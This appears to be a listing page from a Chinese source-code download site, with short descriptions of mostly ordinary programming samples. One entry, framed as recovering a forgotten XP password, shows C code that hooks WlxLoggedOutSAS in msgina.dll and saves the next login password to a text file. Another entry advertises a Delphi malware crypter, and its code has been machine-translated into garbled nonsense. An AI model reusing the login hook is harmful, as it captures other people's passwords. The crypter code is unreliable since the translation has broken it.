-
VC深入详解的随书源码,第1章到第6章全部示例
VC深入详解的随书源码,第1章到第6章全部示例-VC++ in-depth Xiangjie-demand book source code, Chapter 1- Chapter 6 All samples
- 2022-03-24 18:37:28下载
- 积分:1
-
实现计算机图形学的Cohen Sutherland 算法 实现剪裁 颜色填充等功能 功能强大 代码可重用性强...
实现计算机图形学的Cohen Sutherland 算法 实现剪裁 颜色填充等功能 功能强大 代码可重用性强-implement the Cohen Sutherland arithmetic on computer graphics,implement cutting filling collor ,with a powerful reused function
- 2022-01-26 04:23:59下载
- 积分:1
-
DNA sequence design software
DNA sequence design software
- 2022-08-23 21:21:19下载
- 积分:1
-
Delphi OP crypter研究
应用背景样品函数ReadFile(文件名:AnsiString字符串);VaR和公司;公司;公司;公司;公司;公司;公司;公司;公司;公司; ;缓冲区 ; ; ; ; ; ; ;:AnsiString;的规模和规模,并在;和,和,;,;,;readbytes ; ; ; ; ;:整数; ;defaultfilemode:字节;开始结果是:“”; ;defaultfilemode:=我不; ;我不:= 0; ;assignfile(F,文件名);重置(女,1); ;如果(ioresult = 0)然后一开始 ; ; ;尺寸:=文件大小(F); ; ; ;而(尺寸& gt;1024)做和,开始,开始 ; ; ; ; ;规定长度(缓冲区,1024); ; ; ; ; ;blockread(F,缓冲[ 1 ],1024,readbytes);和,和,和,结果:=结果+缓冲区; ; ; ; ; ;12(大小,readbytes);和,结束,结束; ; ; ;规定长度(缓冲区,大小); ; ; ;blockread(F,缓冲[ 1 ],大小);和,结果:=结果+缓冲; ; ; ;关闭一个打开的文件(F);结束了; ;我不defaultfilemode:=;终点功能readeof(delimit1,delimit2:字符串:字符串);VaR ;缓冲区 ; ; ; ; ;:AnsiString;reslength ; ; ;:整数;我和公司的;&;&;&;&;&;&;&;posdelimit ; ;:整数;开始 ;缓冲:= ReadFile(paramstr(0)); ;如果POS(delimit1,缓冲)& gt;POS(delimit2,缓冲)
- 2022-10-07 03:10:02下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
WINDOWS编程循序渐进,配套第2章原代码
WINDOWS编程循序渐进,配套第2章原代码-WINDOWS programming step by step, and the supporting Chapter 2 of the original code
- 2022-02-15 07:13:30下载
- 积分:1
-
学wince的经典书籍 相信会让你喜欢
好好学习哦
学wince的经典书籍 相信会让你喜欢
好好学习哦-Xue wince classic books make sure you like to learn Oh
- 2022-06-29 14:46:47下载
- 积分:1
-
一个用vc++写的可以测试键盘、鼠标的输入,非常适合初学者学习交流只用
一个用vc++写的可以测试键盘、鼠标的输入,非常适合初学者学习交流只用-A used vc++ Written to test the keyboard, mouse input, very suitable for beginners to learn the exchange of only
- 2023-01-13 14:30:04下载
- 积分:1
-
Intusion detection system
Intusion detection system-1
- 2023-01-02 08:45:04下载
- 积分:1
-
使用Micaps后台自动生成图片功能,按需求生成所需要的天气分析图...
使用Micaps后台自动生成图片功能,按需求生成所需要的天气分析图-Micaps automatically generated using the background image function, according to the demand generated by the need for weather analysis
- 2023-06-02 17:25:02下载
- 积分:1